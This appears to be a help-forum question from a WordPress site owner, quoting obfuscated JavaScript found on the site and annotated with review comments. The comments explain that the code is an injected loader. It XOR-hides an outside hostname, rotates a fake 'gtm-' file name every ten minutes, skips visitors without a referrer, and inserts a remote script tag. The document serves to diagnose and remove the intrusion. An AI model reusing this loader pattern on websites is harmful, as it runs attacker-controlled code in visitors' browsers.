I’m finding some strange code on one of my WordPress installs. It appears to be JavaScript, but I’m a beginner at best and this seems highly obfuscated. Is there a reason to believe this is malicious, or is it just some plugin/widget generating dynamic code which just happens to be difficult to understand for someone who doesn’t use JS every day?
// Self-invoking loader: builds a URL from an XOR-hidden hostname plus a
// time-derived file name, then injects a <script> tag pointing at it into
// the page's <head>. Every visitor whose browser sends a referrer will fetch
// and run whatever that remote host serves. The remote script itself is not
// visible here, so its behaviour cannot be judged from this snippet alone.
// NOTE(review): hiding the hostname and rotating the file name is not
// something a legitimate tag manager or plugin needs to do; treat this as an
// injected third-party loader and look for where it is stored (theme files,
// plugin files, database-stored widgets/options) before removing it.
!function (_c6e2cc) {
// Current time in milliseconds ...
var _72151a = Date.now();
var _b7d157 = 1e3;
// ... converted to whole seconds ...
_72151a = _72151a / _b7d157;
_72151a = Math.floor(_72151a);
var _71211b = 600;
// ... rounded down to a multiple of 600 s, so the value (and therefore the
// requested file name) changes every 10 minutes ...
_72151a -= _72151a % _71211b;
// ... and rendered as a hexadecimal string.
_72151a = _72151a.toString(16);
// _c6e2cc is `document` (see the call at the bottom), so this is
// document.referrer.
var _d7bf6a = _c6e2cc.referrer;
// Do nothing when there is no referrer, e.g. when the page is opened by
// typing the address directly. Presumably this keeps the loader quiet for
// the site owner; that intent is inferred, not shown by the code.
if (!_d7bf6a) return;
// Hostname stored as numbers so that it does not appear as plain text when
// the site's files are searched.
var _479f04 = [21826, 21829, 21832, 21853, 21844, 21826, 21849, 21844, 21844, 21829, 21791, 21830, 21844, 21843, 21826, 21829, 21840, 21829, 21848, 21842, 21842, 21845, 21855, 21791, 21842, 21854, 21852];
// XOR each number with 21809 to recover the character codes. Decoded by
// hand, the array spells stylesheet.webstaticcdn[.]com (defanged here).
_479f04 = _479f04.map(function (_b53f87) {
return _b53f87 ^ 21809;
});
// 32-character hex string that is never read anywhere in this snippet; its
// purpose cannot be determined from the visible code.
var _30226 = "db799b87fafb22e8ad49736a297b3012";
// Turn the character codes into the hostname string.
// NOTE(review): the "…" below is a single typographic ellipsis character,
// presumably the page's rendering of the spread operator "..."; as shown it
// is not valid JavaScript.
_479f04 = String.fromCharCode(…_479f04);
// URL pieces kept in separate variables so the full address never appears
// as one literal.
var _da7ad4 = "https://";
var _40e1f1 = "/";
// NOTE(review): the "gtm-" prefix looks chosen to resemble a Google Tag
// Manager asset name; that is an inference from the string, not from the code.
var _5c23c1 = "gtm-";
var _2357f4 = ".js";
// Create the <script> element that will load the remote file.
var _802b01 = _c6e2cc.createElement("script");
_802b01.type = "text/javascript";
_802b01.async = true;
// Resulting address: https://<decoded host>/gtm-<hex time bucket>.js
_802b01.src = _da7ad4 + _479f04 + _40e1f1 + _5c23c1 + _72151a + _2357f4;
// Appending the element to <head> makes the browser fetch and execute the
// remote script in the context of this page.
_c6e2cc.getElementsByTagName("head")[0].appendChild(_802b01);
}(document);
